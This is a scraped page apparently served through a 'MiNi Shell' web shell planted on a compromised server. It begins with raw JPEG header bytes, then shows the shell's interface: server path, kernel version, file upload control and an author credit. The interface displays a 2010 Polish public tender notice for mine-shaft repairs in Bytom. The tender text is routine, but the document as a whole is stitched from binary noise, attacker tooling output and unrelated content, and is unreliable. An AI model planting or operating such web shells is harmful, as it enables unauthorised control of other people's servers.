JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100716/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100716/189717-N-2010.html

<p class="kh_header"><b>Bytom: Wymiana elementów zbrojenia szybowego dla Zakładu Centralny Zakład Odwadniania Kopalń w Czeladzi.

Część I:    Dostawa i wymiana dźwigarów głównych szyb Gigant. 
Część II:   Remont zbrojenia szybowego szybu Jan III - etap V. 
Część III:  Naprawa podszybia na poz.321 m  szyb Kolejowy I.
Część IV:  Wymiana elementów zbrojenia szybowego szybu Witold I.</b><br>
<b>Numer ogłoszenia: 189717 - 2010; data zamieszczenia: 16.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Spółka Restrukturyzacji Kopalń S.A. , ul. Strzelców Bytomskich 207, 41-914 Bytom, woj. śląskie, tel. 032 3513300, 3513301, 3513364, faks 032 3513309, -10, 3513369.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.srk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednoosobowa Spółka Skarbu Państwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana elementów zbrojenia szybowego dla Zakładu Centralny Zakład Odwadniania Kopalń w Czeladzi.

Część I:    Dostawa i wymiana dźwigarów głównych szyb Gigant. 
Część II:   Remont zbrojenia szybowego szybu Jan III - etap V. 
Część III:  Naprawa podszybia na poz.321 m  szyb Kolejowy I.
Część IV:  Wymiana elementów zbrojenia szybowego szybu Witold I..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wymiana elementów zbrojenia szybowego dla Zakładu Centralny Zakład Odwadniania Kopalń w Czeladzi.

Część I:    Dostawa i wymiana dźwigarów głównych szyb Gigant. 
Część II:   Remont zbrojenia szybowego szybu Jan III - etap V. 
Część III:  Naprawa podszybia na poz.321 m  szyb Kolejowy I.
Część IV:  Wymiana elementów zbrojenia szybowego szybu Witold I..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.22.10.00-2, 45.22.12.30-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> dla całości zamówienia 13 800,00 zł ( słownie: trzynaście tysięcy osiemset zł) 
w tym: dla Część I: 4 800,00 zł ( słownie: cztery tysiące osiemset zł), 
            dla Części II: 4 100,00 zł ( słownie:  cztery tysiące sto zł), 
            dla Części III: 2 400,00 zł ( słownie: dwa tysiące zł), 
            dla Części IV: 2 500,00 zł ( słownie: dwa tysiące zł)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.2.2.	Wykonawca winien specjalizować się na rynku w wykonywaniu usług                             o charakterze i złożoności porównywalnej z zakresem zamówienia oraz udokumentować realizację w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej usługi odpowiadającej swoim rodzajem, złożonością i wartością usługom stanowiącym przedmiot zamówienia o wartości minimum: dla Części I: 100 000,00 zł brutto, dla Części II: 80 000,00 zł brutto, dla Części III:  45 000,00 zł brutto, dla Części IV: 50 000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien zatrudniać pracowników o kwalifikacjach i doświadczeniu umożliwiającym wykonanie zadania. Pracownicy wykonujący roboty szybowe dla każdej Części powinni posiadać stosowne uprawnienia adekwatne do zakresu wykonywanych robót, tj. cieśli lub górnika szybowego, sygnalisty szybowego, rewidenta, spawacza, ślusarza, obsługi wciągarek do transportu pionowego, osoby dozoru Wykonawcy nadzorujące prace związane z realizacją w/w prac, muszą posiadać stwierdzenie kwalifikacji w zakresie osoby wyższego dozoru ruchu szybowego oraz osób średniego dozoru ruchu szybowego, zgodnie z rozporządzeniem Ministra Gospodarki z dnia 11 czerwca 2002 r. (Dz. U. Nr 84 z 2002 r.) w sprawie kwalifikacji wymaganych od osób kierownictwa i dozoru ruchu zakładów górniczych  co należy udokumentować w formie stosownego oświadczenia Wykonawcy załączonego do oferty stwierdzającego, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek ich posiadania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Jeżeli Wykonawca polega na zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków obowiązany jest przedłożyć informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których te podmioty posiadają rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową tych podmiotów, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
Wykonawca winien posiadać ubezpieczenie od odpowiedzialności cywilnej na kwotę min. Część I: 200 000,00 zł, Część II: 200 000,00 zł, Część III: 200 000,00 zł, 
Część IV: 200 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełnić druk OFERTA - załącznik nr 1. Ofertę i załączniki należy sporządzić ściśle wg wzorów druków załączonych przez Zamawiającego.
2. Wszystkie przyszłe zobowiązania Wykonawcy związane z umową w sprawie zamówienia publicznego zawiera projekt umowy - załącznik nr 2 do druku OFERTA.
3. Oświadczenia Wykonawcy w trybie art. 44 ustawy Pzp w związku z art. 22 ust.1
ustawy Pzp zgodnie z pkt. 5.1. SIWZ - załączniki nr 3, 3a, 3b, 3c, 3d do druku OFERTA. W przypadku udostępnienia Wykonawcy wiedzy i doświadczenia, potencjału technicznego, osób zdolnych do wykonania zamówienia lub zdolności finansowych przez inne podmioty, niezależnie od charakteru prawnego łączących go z nimi stosunków, Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, które jest zobowiązany dołączyć do załączników nr 3a, 3b, 3c, 3d do druku OFERTA.
4. Zobowiązania Wykonawcy z tytułu gwarancji zgodnie z pkt. 3.6 ppkt. 4 SIWZ - załącznik nr 8 do druku OFERTA.
5. Dokument potwierdzający posiadanie uprawnień do wykonywania urządzeń, remontów (modernizacji) w klasie I, określonej normą PN-B-06200 z grudnia 2002 roku - załączniki A, B, C, D,
6. Dokument potwierdzający wdrożony i certyfikowany system zapewnienia jakości w procesach spawania dla zakresu ujętego w przedmiocie zamówienia, na zgodność z wymaganiami normy ISO 3834-2.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.srk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SRK S.A. ul. Strzelców Bytomskich 207, 41-914 Bytom - 30,00 + VAT w przypadku odbioru osobistego (gotówka) lub pocztą (za zaliczeniem)- w przypadku pobrania SIWZ ze strony internetowej - bezpłatnie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2010 godzina 09:00, miejsce: Spółka Restrukturyzacji Kopalń S.A. 41-914 Bytom, ul. Strzelców Bytomskich 207 - sekretariat Spółki (II piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I:    Dostawa i wymiana dźwigarów głównych szyb Gigant..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy robót do wykonania w szybie Gigant: 
wymiana 8 dźwigarów głównych (dwudzielnych) wykonanych z dwuteownika NP 340x 7520 wraz z dźwigarami rozporowymi wykonanymi z dwuteownika NP 240 oraz wspornikami do mocowania prowadników drewnianych i stalowych (konsoli) wraz ze śrubami mocującymi i podkładkami.
Szczegółowy zakres robót.
1.	Zakres w/w robót obejmuje: wykonanie warsztatowe elementów konstrukcji zbrojenia względnie wyposażenia szybowego będącego przedmiotem wymiany, zgodnie z udostępnioną przez Zamawiającego dokumentacją techniczną, demontaż (odcięcie palnikiem, odkręcenie, wykucie w obudowie itp.) wyznaczonych przez Zamawiającego elementów konstrukcji zbrojenia względnie wyposażenia szybowego oraz wytransportowanie zdemontowanych elementów i gruzu na powierzchnię oraz złożenie w miejscu wskazanym przez Zamawiającego,	montaż elementów konstrukcji zbrojenia względnie wyposażenia szybowego, w tym:	wykucie gniazd w obudowie szybowej pod nowe dźwigary i ich zamurowanie w obudowie szybowej po wcześniejszym ich ustawieniu i wypoziomowaniu - jeśli zachodzi taka potrzeba, zamocowanie wymienionych dźwigarów do istniejących dźwigarów, prowadników szybowych oraz konstrukcji wyposażenia wraz z ich regulacją, przy uwzględnieniu aktualnego operatu pomiarowego będącego w posiadaniu Zamawiającego, montaż zdemontowanych elementów wyposażenia szybowego, np. konstrukcji przedziału drabinowego, dźwigarów rozporowych itp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.22.10.00-2, 45.22.12.30-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II:   Remont zbrojenia szybowego szybu Jan III - etap V..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy robót do wykonania w szybie Jan III:
Dostawa i wymiana 10 sztuk prowadników stalowych skrzynkowych o profilu [ ] 150x200x8000 oraz 20 sztuk dźwigarów głównych o przekroju 162x100x1750, wykonanych z 2-ch kątowników 150x100x12, zespawanych w skrzynkę.
Szczegółowy zakres robót.

1. Zakres w/w robót obejmuje:
wykonanie warsztatowe elementów konstrukcji zbrojenia względnie wyposażenia szybowego będącego przedmiotem wymiany, zgodnie z udostępnioną przez Zamawiającego dokumentacją techniczną, demontaż (odcięcie palnikiem, odkręcenie, wykucie w obudowie itp.) wyznaczonych przez Zamawiającego elementów konstrukcji zbrojenia względnie wyposażenia szybowego oraz wytransportowanie zdemontowanych elementów i gruzu na powierzchnię oraz złożenie w miejscu wskazanym przez Zamawiającego,	montaż elementów konstrukcji zbrojenia względnie wyposażenia szybowego, w tym: wykucie gniazd w obudowie szybowej pod nowe dźwigary i ich zamurowanie w obudowie szybowej po wcześniejszym ich ustawieniu i wypoziomowaniu - jeśli za-chodzi taka potrzeba, zamocowanie wymienionych dźwigarów do istniejących dźwigarów, prowadników szybowych oraz konstrukcji wyposażenia wraz z ich regulacją, przy uwzględnieniu aktualnego operatu pomiarowego będącego w posiadaniu Zamawiającego,	montaż zdemontowanych elementów wyposażenia szybowego, np. konstrukcji przedziału drabinowego, dźwigarów rozporowych itp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.22.10.00-2, 45.22.12.30-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III:  Naprawa podszybia na poz.321 m  szyb Kolejowy I..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy robót do wykonania w szybie Kolejowy:
Wymiana konstrukcji nośnej podszybia: 
­	?      I240x6000-4szt., 
­	?      I300x6000-1szt., 
­	?      I240x12000-4szt., 
­	?      I200x6000-3szt., 
­	?      [200x6000-1szt., 
Wymiana blach podestowych na podszybiu o powierzchni około 100m2, 
Zabezpieczenie antykorozyjne powłoką lakierniczą (farbą podkładową i dwoma warstwami farbą nawierzchniową), Wykonanie dokumentacji powykonawczej. 
 
Dane dotyczące szybu oraz górniczego wyciągu szybowego szybu Kolejowy I wraz z warunkami prowadzenia ruchu przedstawiono w zał. nr 2 do SIWZ.
 Szczegółowy zakres robót.
1.	Zakres w/w robót obejmuje: wykonanie warsztatowe elementów konstrukcji będącego przedmiotem wymiany, na podstawie wizji lokalnej i uzgodnień z Zamawiającym, demontaż (odcięcie palnikiem, odkręcenie, wykucie w obudowie itp.) wyznaczonych przez Zamawiającego elementów konstrukcji oraz wytransportowanie zdemontowanych elementów i gruzu na powierzchnię oraz złożenie w miejscu wskazanym przez Zamawiającego, montaż elementów konstrukcji w tym:
- wykucie gniazd w obudowie pod nowe dźwigary i ich zamurowanie w obudowie po wcześniejszym ich ustawieniu i wypoziomowaniu - jeśli zachodzi taka potrzeba,
- zamocowanie wymienionych dźwigarów do istniejących dźwigarów, 
- montaż zdemontowanych elementów,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.22.10.00-2, 45.22.12.30-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV: Wymiana elementów zbrojenia szybowego szybu Witold I..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy robót.
Zakres rzeczowy robót do wykonania w szybie Witold I: Opracowanie przez wykonawcę projektu Techniczno - technologicznego i organizacyjnego na wykonywane prace, dostawa i wymiana 2 szt. (200x340 i dł. 4600mm) prowadników zgrubionych dębowych, dostawa i wymiana 2 szt. (200x340 i dł. 4300mm) prowadników zgrubionych dębowych, dostawa i wymiana 4 szt. (200x340 i dł. 3800mm) prowadników zgrubionych dębowych, dostawa i wymiana 4 szt. (200x180 i dł. 6100mm) prowadników sosnowych w ciągu prowadniczym wyciągu szybowego, dostawa i wymiana 10 kpl. siatek przepierzenia przedziału drabinowego (na jednym poziomie powierzchnia siatek przepierzenia wynosi 11,7 m2). 
Szczegółowy zakres robót.
1.Demontaż i przygotowanie warsztatowe 2 szt. (200x340 i dł. 4600mm) prowadników zgrubionych dębowych wg. pomiarów bieżących wykonanych przed dokonaniem wymiany. 2. Zabudowa 2 szt. prowadników zgrubionych dębowych, (200x340 i dł. 4600mm). 3. Demontaż i przygotowanie warsztatowe 2 szt. (200x340 i dł. 4300mm) prowadników zgrubionych dębowych wg. pomiarów bieżących wykonanych przed dokonaniem wymiany. 4. Zabudowa 2 szt. prowadników zgrubionych dębowych, (200x340 i dł. 4300mm). 5. Demontaż i przygotowanie warsztatowe 2 szt. (200x340 i dł. 3800mm) prowadników zgrubionych dębowych wg. pomiarów bieżących wykonanych przed dokonaniem wymiany.
6. Zabudowa 2 szt. prowadników zgrubionych dębowych (200x340 i dł. 3800mm).
7. Demontaż i przygotowanie warsztatowe 4 szt. (200x180 i dł. 6100mm) prowadników sosnowych w ciągu prowadniczym wyciągu szybowego wg. pomiarów bieżących wykonanych przed dokonaniem wymiany (miejsce wymiany ww. prowadników zostanie ustalone z wykonawcą robót). 8. Zabudowa 4 szt. (200x180 i dł. 6100mm) prowadników w miejscu wskazanym przez zamawiającego. 9. Dostawa 10 kpl. siatek przepierzenia przedziału drabinowego (na jednym poziomie powierzchnia siatek przepierzenia wynosi 11,7 m2) szczegółowe informacje przekazane będą przez Zamawiającego po rozstrzygnięciu przetargu. 10. Demontaż i wykonanie warsztatowe 10 kpl. siatek przepierzenia przedziału drabinowego (na jednym poziomie powierzchnia siatek przepierzenia wynosi 11,7 m2) wg bieżących pomiarów wykonanych przed dokonaniem wymiany. 11. Zabudowa 10 kpl. siatek przepierzenia przedziału drabinowego (na jednym poziomie powierzchnia siatek przepierzenia wynosi 11,7 m2).
12. Wymiana prowadników zgrubionych dotyczy wymiany poniżej poziomu 270 m, a prowadników sosnowych w ciągach prowadniczych naczyń wyciągowych. 13. Wszystkie elementy podlegające wymianie powinny spełniać wymagania odpowiednich i aktualnie obowiązujących przepisów i norm. 14. Przed przystąpieniem do prac Wykonawca zobowiązany jest do dostarczenia niezbędnych dokumentów dotyczących prawidłowości zabudowy materiałów użytych do wymiany. 15. W czasie prowadzenia prac związanych z wykonaniem powyższego zadania Zamawiający zapewnia: obsługę wyciągu szybowego Maszynista plus dwóch sygnalistów, dostawę energii elektrycznej do miejsca prowadzenia ww. prac. Wykonawca nie zapewnia dostawy sprężonego powietrza, tylko zapewnia wykorzystanie rurociągu sprężonego powietrza zabudowanego w szybie Witold I od poziomu zrębu do poz. 270 m, pomieszczenie gospodarcze, łaźnię i kontrolę ewidencji przebywania osób na dole zakładu górniczego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.22.10.00-2, 45.22.12.30-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com